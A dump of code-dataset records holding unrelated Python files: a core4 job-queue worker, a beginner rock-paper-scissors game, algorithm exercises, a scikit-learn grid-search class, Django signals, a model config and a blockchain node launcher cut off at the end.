\"work_jobs\",\n \"remove_jobs\",\n \"flag_jobs\",\n \"collect_stats\")\n\n\nclass CoreWorker(CoreDaemon, core4.queue.query.QueryMixin):\n \"\"\"\n This class is the working horse to carry and execute jobs. Workers have an\n identifier. This identifier defaults to the hostname of the worker and must\n be unique across the cluster.\n \"\"\"\n kind = \"worker\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.offset = None\n self.steps = STEPS\n self.plan = self.create_plan()\n self.cycle.update(dict([(s, 0) for s in self.steps]))\n self.stats_collector = collections.deque(maxlen=\n round(\n self.config.worker.avg_stats_secs\n / self.config.worker.execution_plan.collect_stats))\n # populate with first resource-tuple.\n self.stats_collector.append(\n (min(psutil.cpu_percent(percpu=True)),\n psutil.virtual_memory()[4] / 2. ** 20))\n self.job = None\n self.handle_signal()\n\n def handle_signal(self):\n # ignore signal from children to avoid defunct zombies\n signal.signal(signal.SIGCHLD, signal.SIG_IGN)\n\n def startup(self):\n \"\"\"\n Implements the **startup** phase of the scheduler. The method is based\n on :class:`.CoreDaemon` implementation and additionally spawns\n :meth:`.collect_job`.\n \"\"\"\n super().startup()\n intro = core4.service.introspect.main.CoreIntrospector()\n self.job = intro.collect_job()\n\n def cleanup(self):\n \"\"\"\n General housekeeping method of the worker.\n \"\"\"\n ret = self.config.sys.lock.delete_many({\"owner\": self.identifier})\n self.logger.info(\n \"cleanup removed [%d] sys.lock records\", ret.raw_result[\"n\"])\n\n def create_plan(self):\n \"\"\"\n Creates the worker's execution plan in the main processing loop:\n\n #. :meth:`.work_jobs` - get next job, inactivate or execute\n #. :meth:`.remove_jobs` - remove jobs\n #. :meth:`.flag_jobs` - flag jobs as non-stoppers, zombies, killed\n #. :meth:`.collect_stats` - collect and save general sever metrics\n\n :return: dict with step ``name``, ``interval``, ``next`` timestamp\n to execute and method reference ``call``\n \"\"\"\n plan = []\n now = core4.util.node.now()\n for s in self.steps:\n interval = self.config.worker.execution_plan[s]\n if self.wait_time is None:\n self.wait_time = interval\n else:\n self.wait_time = min(interval, self.wait_time)\n self.logger.debug(\"set [%s] interval [%1.2f] sec.\", s, interval)\n plan.append({\n \"name\": s,\n \"interval\": interval,\n \"next\": now + timedelta(seconds=interval),\n \"call\": getattr(self, s)\n })\n self.logger.debug(\n \"create execution plan with cycle time [%1.2f] sec.\",\n self.wait_time)\n return plan\n\n def run_step(self):\n \"\"\"\n This method implements the steps of the worker.\n See :meth:`.create_plan` for further details.\n \"\"\"\n for step in self.plan:\n interval = timedelta(seconds=step[\"interval\"])\n if step[\"next\"] <= self.at:\n self.logger.debug(\"enter [%s] at cycle [%s]\",\n step[\"name\"], self.cycle[\"total\"])\n step[\"call\"]()\n self.logger.debug(\"exit [%s] at cycle [%s]\",\n step[\"name\"], self.cycle[\"total\"])\n step[\"next\"] = self.at + interval\n\n def work_jobs(self):\n \"\"\"\n This method is part of the main\n :meth:`loop ` phase of the worker.\n\n The step queries and handles the best next job from ``sys.queue`` (see\n :meth:`.get_next_job` and :meth:`.start_job`). Furthermore this method\n *inactivates* jobs.\n \"\"\"\n doc = self.get_next_job()\n if doc is None:\n return\n if not self.inactivate(doc):\n self.start_job(doc)\n\n def inactivate(self, doc):\n \"\"\"\n This method is called by :meth:`.work_jobs` to mark jobs which have\n reached ``inactive_at`` as ``inactive``.\n\n :param doc: job document to inactivate\n \"\"\"\n if doc[\"state\"] == core4.queue.job.STATE_DEFERRED:\n if doc.get(\"inactive_at\", None):\n if doc[\"inactive_at\"] <= self.at:\n update = {\n \"state\": core4.queue.job.STATE_INACTIVE\n }\n ret = self.config.sys.queue.update_one(\n filter={\"_id\": doc[\"_id\"]}, update={\"$set\": update})\n if ret.raw_result[\"n\"] != 1:\n raise RuntimeError(\n \"failed to inactivate job [{}]\".format(doc[\"_id\"]))\n self.queue.unlock_job(doc[\"_id\"])\n self.queue.make_stat('inactivate_job', str(doc[\"_id\"]))\n self.logger.error(\"done execution with [inactive] - [%s] \"\n \"with [%s]\", doc[\"name\"], doc[\"_id\"])\n return True\n return False\n\n def start_job(self, doc, run_async=True):\n \"\"\"\n This method is called by :meth:`.work_jobs` and encapsulated for\n testing purposes, only.\n\n :param doc: job document to launch\n :param run_async: run asynchronous (default) wait for process to\n complete\n \"\"\"\n now = self.at\n update = {\n \"state\": core4.queue.job.STATE_RUNNING,\n \"started_at\": now,\n \"query_at\": None,\n \"trial\": doc[\"trial\"] + 1,\n \"locked\": {\n \"at\": now,\n \"heartbeat\": now,\n \"hostname\": core4.util.node.get_hostname(),\n \"pid\": None,\n \"worker\": self.identifier\n }\n }\n ret = self.config.sys.queue.update_one(\n filter={\"_id\": doc[\"_id\"]}, update={\"$set\": update})\n if ret.raw_result[\"n\"] != 1:\n raise RuntimeError(\n \"failed to update job [{}] state [starting]\".format(\n doc[\"_id\"]))\n self.queue.make_stat('request_start_job', str(doc[\"_id\"]))\n self.logger.info(\"launching [%s] with _id [%s]\", doc[\"name\"],\n doc[\"_id\"])\n if run_async:\n core4.service.introspect.main.exec_project(\n doc[\"name\"], EXECUTE, wait=False, job_id=str(doc[\"_id\"]))\n else:\n from core4.queue.process import CoreWorkerProcess\n CoreWorkerProcess().start(doc[\"_id\"], redirect=False, manual=True)\n\n def get_next_job(self):\n \"\"\"\n Queries the best next job from collection ``sys.queue``. This method\n filters and orders jobs with the following properties:\n\n **filter:**\n\n * not ``locked``\n * with ``attempts_left``\n * in waiting state (``pending``, ``failed`` or ``deferred``)\n * eligable for this or all worker (``.identifier``)\n * not removed, yet (``.removed_at``)\n * not killed, yet (``.killed_at``)\n * with no or past query time (``.query_at``)\n\n **sort order:**\n\n * ``.force``\n * ``.priority``\n * enqueue date/time (job ``.id`` sort order)\n\n The method memorises an ``offset`` attribute to ensure all jobs have a\n chance to get queries across multiple workers. If all jobs have been\n checked, then the offset is reset and querying starts from top.\n\n In order to handle high priority jobs, the existence of a job *below*\n the current offset is checked. If a job with a higher priority exists\n below the ``offset``, then this high-priority job is returned.\n\n :return: job document from collection ``sys.queue``\n \"\"\"\n query = [\n {'locked': None},\n {'attempts_left': {'$gt': 0}},\n {'$or': [\n {'state': s} for s in [\n core4.queue.job.STATE_PENDING,\n core4.queue.job.STATE_FAILED,\n core4.queue.job.STATE_DEFERRED]]\n },\n {'$or': [{'worker': self.identifier},\n {'worker': None}]},\n {'removed_at': None},\n {'killed_at': None},\n {'$or': [{'query_at': {'$lte': self.at}},\n {'query_at': None}]},\n ]\n order = [\n ('force', pymongo.DESCENDING),\n ('priority', pymongo.DESCENDING),\n ('_id', pymongo.ASCENDING)\n ]\n if self.offset:\n cur2 = self.config.sys.queue.find(\n filter={'$and': query + [{\"_id\": {\"$lte\": self.offset}}]},\n sort=order)\n query.append({'_id': {'$gt': self.offset}})\n else:\n cur2 = None\n cur1 = self.config.sys.queue.find(\n filter={'$and': query}, sort=order)\n while True:\n try:\n data = cur1.next()\n except StopIteration:\n data = None\n if cur2 is not None:\n try:\n data2 = cur2.next()\n except StopIteration:\n data2 = None\n else:\n data2 = None\n if data is None:\n if data2 is None:\n self.offset = None\n return None\n self.logger.debug(\n \"next job from top chunk [%s]\", data2[\"_id\"])\n data = data2\n else:\n self.logger.debug(\n \"next job from bottom chunk [%s]\", data[\"_id\"])\n if data2 is not None and data2[\"priority\"] > data[\"priority\"]:\n data = data2\n self.logger.debug(\n \"next job from prioritised top chunk [%s]\",\n data[\"_id\"])\n project = data[\"name\"].split(\".\")[0]\n if self.queue.maintenance(project):\n self.logger.debug(\n \"skipped job [%s] in maintenance\", data[\"_id\"])\n continue\n\n # check system resources\n cur_stats = self.avg_stats()\n if ((cur_stats[0] > self.config.worker.max_cpu)\n or (cur_stats[1] < self.config.worker.min_free_ram)):\n if not data[\"force\"]:\n self.logger.info(\n 'skipped job [%s] with _id [%s]: '\n 'not enough resources available: '\n 'cpu [%1.1f], memory [%1.1f]',\n data[\"name\"], data[\"_id\"], *cur_stats[:2])\n return None\n\n # check max_parallel\n count = self.config.sys.queue.count_documents(\n filter={'name': data[\"name\"],\n \"locked.worker\": self.identifier})\n if count >= data[\"max_parallel\"]:\n continue\n # acquire lock\n if not self.queue.lock_job(self.identifier, data[\"_id\"]):\n self.logger.debug('skipped job [%s] due to lock failure',\n data[\"_id\"])\n continue\n\n self.offset = data[\"_id\"]\n self.logger.debug('successfully reserved [%s]', data[\"_id\"])\n return data\n\n def remove_jobs(self):\n \"\"\"\n This method is part of the main\n :meth:`loop ` phase of the worker.\n\n The processing step queries all jobs with a specified ``removed_at``\n attribute. After successful job lock, the job is moved from\n ``sys.queue`` into ``sys.journal``.\n\n .. note:: This method does not unlock the job from ``sys.lock``. This\n special behavior is required to prevent race conditions\n between multiple workers simultaneously removing *and*\n locking the job between ``sys.queue`` and ``sys.lock``.\n \"\"\"\n\n cur = self.config.sys.queue.find(\n {\"removed_at\": {\"$ne\": None}}\n )\n for doc in cur:\n if self.queue.lock_job(self.identifier, doc[\"_id\"]):\n if self.queue.journal(doc):\n ret = self.config.sys.queue.delete_one({\"_id\": doc[\"_id\"]})\n if ret.raw_result[\"n\"] != 1:\n raise RuntimeError(\n \"failed to remove job [{}]\".format(doc[\"_id\"]))\n self.queue.make_stat('remove_job', str(doc[\"_id\"]))\n self.logger.info(\n \"successfully journaled and removed job [%s]\",\n doc[\"_id\"])\n # note: we will not unlock the job to prevent race\n # conditions with other workds; this will be settled\n # with .cleanup\n continue\n self.logger.error(\n \"failed to journal and remove job [%s]\", doc[\"_id\"])\n\n def flag_jobs(self):\n \"\"\"\n This method is part of the main\n :meth:`loop ` phase of the worker.\n\n The method queries all jobs in state ``running`` locked by the current\n worker and forward processing to\n\n #. identify and flag non-stopping jobs (see :meth:`.flag_nonstop`),\n #. identify and flag zombies (see :meth:`.flag_zombie`),\n #. identify and handle died jobs (see :meth:`.check_pid`), and to\n #. manage jobs requested to be kill (see :meth:`.kill_pid` and\n :meth:`.check_kill`)\n \"\"\"\n cur = self.config.sys.queue.find(\n {\n \"state\": core4.queue.job.STATE_RUNNING,\n \"locked.worker\": self.identifier\n },\n projection=[\n \"_id\", \"wall_time\", \"wall_at\", \"zombie_time\", \"zombie_at\",\n \"started_at\", \"locked.heartbeat\", \"locked.pid\", \"killed_at\",\n \"name\"\n ]\n )\n for doc in cur:\n self.flag_nonstop(doc)\n self.flag_zombie(doc)\n self.check_pid(doc)\n self.kill_pid(doc)\n self.check_kill()\n\n def check_kill(self):\n \"\"\"\n Identifies jobs requested to be killed in waiting state (``pending``,\n ``deferred`` or ``failed``).\n\n :param doc: job MongoDB document\n \"\"\"\n cur = self.config.sys.queue.find(\n {\n \"state\": {\"$in\": [\n core4.queue.job.STATE_PENDING,\n core4.queue.job.STATE_DEFERRED,\n core4.queue.job.STATE_FAILED\n ]},\n \"killed_at\": {\n \"$ne\": None\n }\n },\n projection=[\n \"_id\", \"wall_time\", \"wall_at\", \"zombie_time\", \"zombie_at\",\n \"started_at\", \"locked.heartbeat\", \"locked.pid\", \"killed_at\",\n \"name\"\n ]\n )\n for doc in cur:\n if self.queue.lock_job(self.identifier, doc[\"_id\"]):\n self.kill_pid(doc)\n\n def flag_nonstop(self, doc):\n \"\"\"\n Identifies non-stopping jobs which exceeded their runtime beyond the\n specified ``wall_at`` timestamp.\n\n .. note:: The ``wall_time`` attribute represents the timestamp when\n the job was flagged. Job execution continues without further\n action.\n\n :param doc: job MongoDB document\n \"\"\"\n if doc[\"wall_time\"] and not doc[\"wall_at\"]:\n if doc[\"started_at\"] < (self.at\n - timedelta(seconds=doc[\"wall_time\"])):\n ret = self.config.sys.queue.update_one(\n filter={\n \"_id\": doc[\"_id\"]\n },\n update={\"$set\": {\"wall_at\": core4.util.node.mongo_now()}})\n if ret.raw_result[\"n\"] == 1:\n self.logger.warning(\n \"successfully set non-stop job [%s]\", doc[\"_id\"])\n self.queue.make_stat('flag_nonstop', str(doc[\"_id\"]))\n\n def flag_zombie(self, doc):\n \"\"\"\n Identifies zombie jobs which have not updated their ``heartbeat`` (in\n ``.locked`` attribute) for date/time range specified in the\n ``.zombie_time`` attribute.\n\n The jobs' :meth:`.progress ` method\n updates the ``heartbeat``. Therefore job developers are expected to\n call this method for long-running algorithms regularly.\n\n .. note:: The ``zombie_at`` attribute represents the timestamp when\n the job was flagged. Job execution continues without further\n action.\n\n :param doc: job MongoDB document\n \"\"\"\n if not doc[\"zombie_at\"]:\n if doc[\"locked\"][\"heartbeat\"] < (self.at - timedelta(\n seconds=doc[\"zombie_time\"])):\n ret = self.config.sys.queue.update_one(\n filter={\n \"_id\": doc[\"_id\"]\n },\n update={\n \"$set\": {\"zombie_at\": core4.util.node.mongo_now()}\n }\n )\n if ret.raw_result[\"n\"] == 1:\n self.logger.warning(\n \"successfully set zombie job [%s]\", doc[\"_id\"])\n self.queue.make_stat('flag_zombie', str(doc[\"_id\"]))\n\n def check_pid(self, doc):\n \"\"\"\n Identifies and handles died jobs. If the job PID does not exists, the\n job is flagged ``killed_at`` in ``sys.queue``.\n\n :param doc: job MongoDB document\n \"\"\"\n if \"locked\" in doc and doc[\"locked\"][\"pid\"] is not None:\n (found, _) = self.pid_exists(doc)\n if not found:\n self.logger.error(\"pid [%s] not exists, killing\",\n doc[\"locked\"][\"pid\"])\n self.queue.exec_kill(doc)\n\n def kill_pid(self, doc):\n \"\"\"\n Handles jobs which have been requested to be killed. If the process\n exists, then it is killed and the job state is set to ``killed``.\n\n :param doc: job MongoDB document\n \"\"\"\n if doc[\"killed_at\"]:\n (found, proc) = self.pid_exists(doc)\n if found and proc:\n proc.kill()\n self.queue.exec_kill(doc)\n\n def pid_exists(self, doc):\n \"\"\"\n Returns ``True`` if the job exists and its OS state is *DEAD* or\n *ZOMBIE*. The :class:`psutil.Process` object is also returned for\n further action.\n\n :param doc: job MongoDB document\n :return: tuple of ``True`` or ``False`` and the job process or None\n \"\"\"\n proc = None\n if \"locked\" in doc and doc[\"locked\"][\"pid\"] is not None:\n if psutil.pid_exists(doc[\"locked\"][\"pid\"]):\n proc = psutil.Process(doc[\"locked\"][\"pid\"])\n if proc.status() not in (psutil.STATUS_DEAD,\n psutil.STATUS_ZOMBIE):\n return True, proc\n return False, proc\n\n def collect_stats(self):\n \"\"\"\n Collects cpu and memory, inserts it as tuple into self.stats_collector.\n CPU is computed via CPU-Utilization/(idle-time+io-wait) free RAM is in\n MB.\n \"\"\"\n # psutil already accounts for idle and io-wait (idle and waiting for\n # IO), we are not interested in both.\n self.stats_collector.append(\n (min(psutil.cpu_percent(percpu=True)),\n psutil.virtual_memory()[4] / 2. ** 20))\n\n def avg_stats(self):\n \"\"\"\n :return: tuple of average cpu and memory over the time configured in\n config.worker.avg_stats_secs.\n \"\"\"\n cpu = sum(c for c, m in self.stats_collector)\n mem = sum(m for c, m in self.stats_collector)\n div = len(self.stats_collector)\n return cpu / div, mem / div\n\nif __name__ == '__main__':\n import core4.logger.mixin\n core4.logger.mixin.logon()\n w = CoreWorker()\n print(\"start worker [%s]\" % (w.identifier))\n w.start()\n","repo_name":"plan-net/core4","sub_path":"core4/queue/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":20834,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"24087137625","text":"# Rock Paper Scissors Game\n\nimport random\n#from time import puase\n\noptions = [\"Rock\", \"Paper\", \"Scissors\"]\nuser_options = [\"R\", \"r\", \"s\", \"S\", \"P\", \"p\"]\n\nis_running = True\n\nwhile is_running:\n def welcome():\n print('Welcome to Rock Paper Scissors')\n print(\"Rock beats Scissors\\nPaper beats Rock\\nScissors beats Paper\")\n print(\"R is for Rock\\nP is for Paper\\nS is for Scissors\")\n\nwelcome()\ncomputer = (random.choice(options))\nanswer = []\nanswer.append(computer)\n# User makes a selection\ninput_user = input(\"Please choose R, P, or S:\\n\")\n\n# If conditions are met\nif (input_user in user_options):\n print(\"Great choice\")\n if input_user == user_options[0] or input_user == user_options[1]:\n print(\"You have selected\", options[0])\n elif input_user == user_options[2] or input_user == user_options[3]:\n print(\"You have selected\", options[2])\n elif input_user == user_options[4] or input_user == user_options[5]:\n print(\"You have selected\", options[1])\nelse:\n print(\"Sorry, please select R, P or S\")\n\ndef new_game():\n if (input_user == answer):\n print (\"Oops! It's a draw\")\n if (input_user == \"Rock\" and answer == \"Scissors\"):\n print (\"Congratulations! You won. Rock crashes Scissors\")\n elif (input_user == \"Rock\" and answer == \"Paper\"):\n print (\"Sorry, you lost. Paper wraps Rocks\")\n\n if (input_user == \"Scissors\" and answer == \"Paper\"):\n print (\"Congratulations! You won. Rock crashes Scissors\")\n elif (input_user == \"Scissors\" and answer == \"Rock\"):\n print (\"Sorry, you lost. Rock crushes Scissors\")\n\n if (input_user == \"Paper\" and answer == \"Rock\"):\n print (\"Congratulations! You won. Paper wraps Rock\")\n elif (input_user == \"Paper\" and answer == \"Scissors\"):\n print (\"Sorry, you lost. Scissors cuts Paper\")\nnew_game()\n\n# def new_game():\n# if computer == answer:\n# print(\"Draw\")\n# elif game == \"R\" and answer != \"P\":\n# print(\"You win\")\n# elif game == \"P\" and answer != \"S\":\n# print(\"You win\")\n# elif game == \"S\" and answer != \"R\":\n# print(\"You win\")\n# else:\n# print('Sorry you lost')\n# print(f\"Computer choose {answer}\")\n# new_game()\n\nchoice = input(\"Let's play again? Y/N: \")\nif choice == \"Y\":\n pass\nif choice == \"N\":\n is_running = False\nprint(\"See you again next time!\") \nis_running = False\n","repo_name":"aearns/Zuri_Tasks","sub_path":"Tasks/Python/RockPaperScissors.py","file_name":"RockPaperScissors.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"8877310117","text":"#!/usr/bin/env python3\n\ntask = \"\"\"\nTask:\nWrite a Python program to check if every consecutive sequence of zeroes is followed by\na consecutive sequence of ones of same length in a given string. Return True/False.\n\"\"\"\n\nprint(task)\n\ndef seq_check(seq):\n while '01' in seq:\n seq = seq.replace('01', '')\n return len(seq) == 0\n\nseq = [\"01010101\", \"00\", \"000111000111\", \"00011100011\"]\n\nfor i in seq: print( \"{:12} - {}\".format( i, seq_check(i) ) )","repo_name":"woodyart/py-excercises","sub_path":"basic-part-i/142.py","file_name":"142.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23862275264","text":"from joblib import Parallel, delayed\nfrom sklearn.model_selection import ParameterGrid\nfrom sklearn.base import clone\nimport pandas as pd\nfrom abc import ABCMeta, abstractmethod\nfrom time import time\n\nfrom sklearn.base import BaseEstimator, MetaEstimatorMixin\nfrom mvmm.clustering_measures import several_unsupervised_cluster_scores, \\\n MEASURE_MIN_GOOD\n\n# TODO: add random seed\n\n\nclass BaseGridSearch(MetaEstimatorMixin, BaseEstimator, metaclass=ABCMeta):\n def __init__(self,\n base_estimator,\n param_grid={},\n select_metric='bic',\n metrics2compute=['aic', 'bic'],\n n_jobs=None,\n backend=None,\n verbose=0,\n pre_dispatch='2*n_jobs'):\n\n self.base_estimator = base_estimator\n self.param_grid = param_grid\n self.select_metric = select_metric\n self.metrics2compute = metrics2compute\n self.n_jobs = n_jobs\n self.backend = backend\n self.verbose = verbose\n self.pre_dispatch = pre_dispatch\n\n @abstractmethod\n def fit_and_score(self, estimator, X, parameters, return_estimator=True):\n \"\"\"\n Fits and estimator on a dataset and scores results.\n\n Output\n ------\n scores, metadata, estimator\n \"\"\"\n pass\n\n @property\n def param_grid_(self):\n \"\"\"\n List of all parameter settings\n \"\"\"\n return list(ParameterGrid(self.param_grid))\n\n def fit(self, X):\n\n if self.verbose >= 1:\n print(\"Fitting {} candidates\".format(len(self.param_grid_)))\n\n start_time = time()\n if self.n_jobs is not None:\n parallel = Parallel(n_jobs=self.n_jobs,\n backend=self.backend,\n verbose=self.verbose,\n pre_dispatch=self.pre_dispatch)\n\n with parallel:\n\n results = \\\n parallel(delayed(self.fit_and_score)\n (clone(self.base_estimator), X=X,\n parameters=params)\n for params in self.param_grid_)\n else:\n results = [self.fit_and_score(clone(self.base_estimator),\n X=X, parameters=params)\n for params in self.param_grid_]\n\n self.metadata_ = {'fits': [res[1] for res in results],\n 'fit_time': time() - start_time}\n\n self.estimators_ = [res[2] for res in results]\n\n self.model_sel_scores_ = \\\n several_unsupervised_cluster_scores(X=X,\n estimators=self.estimators_,\n measures=self.metrics2compute)\n\n return self\n\n def check_fit(self):\n return hasattr(self, 'estimators_')\n\n @property\n def best_idx_(self):\n \"\"\"\n Index of selected model.\n \"\"\"\n if self.check_fit():\n if MEASURE_MIN_GOOD[self.select_metric]:\n return self.model_sel_scores_[self.select_metric].idxmin()\n else:\n return self.model_sel_scores_[self.select_metric].idxmax()\n\n else:\n return None\n\n @property\n def best_params_(self):\n \"\"\"\n Parameter setting for selected model.\n \"\"\"\n if self.check_fit():\n return self.metadata_['fits'][self.best_idx_]['parameters']\n else:\n return None\n\n @property\n def best_estimator_(self):\n \"\"\"\n Selected estimator.\n \"\"\"\n if self.check_fit():\n return self.estimators_[self.best_idx_]\n else:\n return None\n\n def predict(self, X):\n \"\"\"\n Predict the labels for the data samples in X using trained model.\n \"\"\"\n return self.best_estimator_.predict(X)\n\n def predict_proba(self, X):\n \"\"\"\n Predict posterior probability of each component given the data.\n \"\"\"\n return self.best_estimator_.predict_proba(X)\n\n def sample(self, n_samples=1):\n \"\"\"\n Generate random samples from the fitted Gaussian distribution.\n \"\"\"\n return self.best_estimator_.sample(n_samples=n_samples)\n\n def score(self, X, y=None):\n \"\"\"\n Compute the per-sample average log-likelihood of the given data X.\n \"\"\"\n return self.best_estimator_.score(X)\n\n def score_samples(self, X):\n \"\"\"\n Compute the weighted log probabilities for each sample.\n \"\"\"\n return self.best_estimator_.score_samples(X)\n","repo_name":"idc9/mvmm","sub_path":"mvmm/BaseGridSearch.py","file_name":"BaseGridSearch.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"8473073088","text":"'''用自定义函数数值替换指定字符串并保存\n\n假设每行只有一个。\n\n当前:读取slide-01.svg,用递增16位字符串替换#FFFFFF。\n\n用于个人一个绘图项目,希望把#000000到#FFFFFF,按照1步进递增的条带画出来。\n'''\n\nimport os\n\ndef exchangeInMyWay(fileName):\n writeC = ''\n counterA = 0\n fileOpen = open(fileName,'r')\n # replace this\n target = '#FFFFFF'\n targetLong = len(target)\n for line in fileOpen:\n if target in line:\n # replace this\n hexA = hex(counterA)[2:]\n hexA = (6 - len(hexA)) * '0' + hexA\n line = line.replace(target, '#'+hexA, 1)\n counterA += 1\n writeC += line\n writeFile = open('1_'+fileName, 'w')\n writeFile.write(writeC)\n writeFile.close()\n fileOpen.close()\n #input(counterA)\n\n\n\nexchangeInMyWay('slide-01.svg')\n","repo_name":"Kamilet/learning-coding","sub_path":"simple-program/tools-in-python-shell/Replace-chars-in-file.py","file_name":"Replace-chars-in-file.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36122622639","text":"from django.db.models.signals import m2m_changed, pre_save \nfrom django.dispatch import receiver\nfrom .models import Book , Category\nfrom django.template.defaultfilters import slugify\n#this signal will be emitted when the an object of model Book is created (not created in database as it pre_save will be sent at the beginning of the save method)\n#if the admin did not add the available number of copies it will be by default set to be equal to the total number of copies\n@receiver(pre_save, sender=Book)\ndef addnig_defaut_fields(sender, instance, *args, **kwargs):\n if not instance.available_number_of_copies:\n instance.available_number_of_copies = instance.total_number_of_copies\n\n # this is in case you want it as a column in the database.\n # note that the admin don't have to enter the slug field so I used signal to make it's default to be equal to slugified title.\n instance.slug = slugify(instance.title)\n \n\n#I did that just to simplify dealing with the book model \n\n#this signal will be emitted whenever any chages happenned in the m2m relationship \n#which mean any user borrows a copy of the book the number of copies for this book will be reduced by 1\n# and when a user return the borrowed copy of the book the number of copies will be increased by 1 \n@receiver(m2m_changed, sender=Book.user.through)\ndef update_available_number_of_copies(*args , **kwargs):\n if kwargs['action'] == 'post_add':\n kwargs['instance'].available_number_of_copies -= 1\n elif kwargs['action'] == 'post_remove':\n kwargs['instance'].available_number_of_copies += 1\n\n@receiver(pre_save, sender=Category)\ndef addnig_defaut_category_fields(sender, instance, *args, **kwargs):\n instance.slug = slugify(instance.title)","repo_name":"cod3father/LibraryManagement","sub_path":"Books/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71040434020","text":"def smallestSubstringContaining(bigString, smallString):\n targetCharCounts = getCharCounts(smallString)\n substringBounds = getSubStringBounds(bigString, targetCharCounts)\n return getStringFromBounds(bigString, substringBounds)\n\n\ndef getSubStringBounds(string, targetCharCounts):\n subStringBounds = [0, float(\"inf\")]\n subStringCharCounts = {}\n numUniqueChar = len(targetCharCounts.keys())\n numuniqueCharFound = 0\n leftPtr = 0\n rightPtr = 0\n while rightPtr < len(string):\n rightChar = string[rightPtr]\n if rightChar not in targetCharCounts:\n rightPtr += 1\n continue\n increaseCharCount(rightChar, subStringCharCounts)\n if subStringCharCounts[rightChar] == targetCharCounts[rightChar]:\n numuniqueCharFound += 1\n while numuniqueCharFound == numUniqueChar and leftPtr <= rightPtr:\n subStringBounds = getCloserBounds(\n leftPtr, rightPtr, subStringBounds[0], subStringBounds[1])\n leftChar = string[leftPtr]\n if leftChar not in targetCharCounts:\n leftPtr += 1\n continue\n if subStringCharCounts[leftChar] == targetCharCounts[leftChar]:\n numuniqueCharFound -= 1\n decreaseCharCount(leftChar, subStringCharCounts)\n leftPtr += 1\n rightPtr += 1\n return subStringBounds\n\n\ndef getCloserBounds(idx1, idx2, idx3, idx4):\n return [idx1, idx2] if idx2-idx1 < idx4-idx3 else [idx3, idx4]\n\n\ndef getStringFromBounds(string, bounds):\n start, end = bounds\n if end == float(\"inf\"):\n return \"\"\n return string[start:end+1]\n\n\ndef getCharCounts(string):\n charCounts = {}\n for char in string:\n increaseCharCount(char, charCounts)\n return charCounts\n\n\ndef increaseCharCount(char, charCounts):\n if char not in charCounts:\n charCounts[char] = 0\n charCounts[char] += 1\n\n\ndef decreaseCharCount(char, charCount):\n charCount[char] -= 1\n","repo_name":"caleberi/algoexpert","sub_path":"smallestSubstringContaining.py","file_name":"smallestSubstringContaining.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"} +{"seq_id":"73468431142","text":"\"\"\"\n deployment file for age and gender classification\n a : zhonghy\n date: 2019-1-16\n\n\"\"\"\n\n# import the necessary packages\nimport sys\n# sys.path.append(\"F:\\ProgramPractice\\DLFCV\")\nsys.path.append(\"E:\\ZWDX_Learn\\ProgramPractice\\DLFCV\")\n\nfrom age_gender.config.age_gender_config import OUTPU_BASE\nfrom os import path\n\n# define the path to the dlib facial landmark predictor\nDLIB_LANDMARK_PATH = \"shape_predictor_68_face_landmarks.dat\"\n\n# defeine the path to the age network + supporting files\n# company\n# AGE_NETWORK_PATH = \"../../../data/adience/checkpoints/age\"\n# home\nAGE_NETWORK_PATH = \"../../../../data/adience/checkpoints/age\"\n\nAGE_PREFIX = \"agenet\"\nAGE_EPOCH = 150\nAGE_LABEL_ENCODER = path.sep.join([OUTPU_BASE, \"age_le.cpickle\"])\nAGE_MEANS = path.sep.join([OUTPU_BASE, \"age_adience_mean.json\"])\n\n# defeine the path to the gender network + supporting files\n# company\n# GENDER_NETWORK_PATH = \"../../../data/adience/checkpoints/gender\"\n# home\nGENDER_NETWORK_PATH = \"../../../../data/adience/checkpoints/gender\"\n\nGENDER_PREFIX = \"gendernet\"\nGENDER_EPOCH = 110\nGENDER_LABEL_ENCODER = path.sep.join([OUTPU_BASE, \"gender_le.cpickle\"])\nGENDER_MEANS = path.sep.join([OUTPU_BASE, \"gender_adience_mean.json\"])\n\n\n","repo_name":"530634028/ProgramPractice","sub_path":"DLFCV/age_gender/config/age_gender_deploy.py","file_name":"age_gender_deploy.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41824943904","text":"#!/usr/bin/env python\nimport argparse\nimport asyncio\n\nfrom chain.p2p import P2PServer as Server\nfrom chain.utils.log import logger\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"port\", type=int, help=\"Listening port\")\nparser.add_argument(\n \"-b\",\n \"--bootstrap\",\n type=lambda x: int(x) if x.isdigit() else x,\n action=\"append\",\n metavar=(\"IP\", \"PORT\"),\n nargs=2,\n help=\"Starting by bootstrapping node, can specify multiple IPs\",\n)\n\nparser.add_argument(\"-m\", \"--mine\", action=\"store_true\", help=\"Mining blocks\")\n\nparser.add_argument(\"-D\", \"--debug\", action=\"store_true\", help=\"Debug mode\")\n\nargs = parser.parse_args()\n\nserver = Server(mining=args.mine)\nserver.listen(args.port)\n\nloop = asyncio.get_event_loop()\nloop.set_debug(args.debug)\n\n\nif args.bootstrap:\n logger.debug(\n loop.run_until_complete(\n server.bootstrap([(ip, port) for ip, port in args.bootstrap])\n )\n )\n\ntry:\n if server.mining:\n loop.run_until_complete(server.mine_blockchain())\n else:\n loop.run_forever()\nexcept KeyboardInterrupt:\n logger.debug(server.blockchain[-5:])\n server.stop()\nfinally:\n 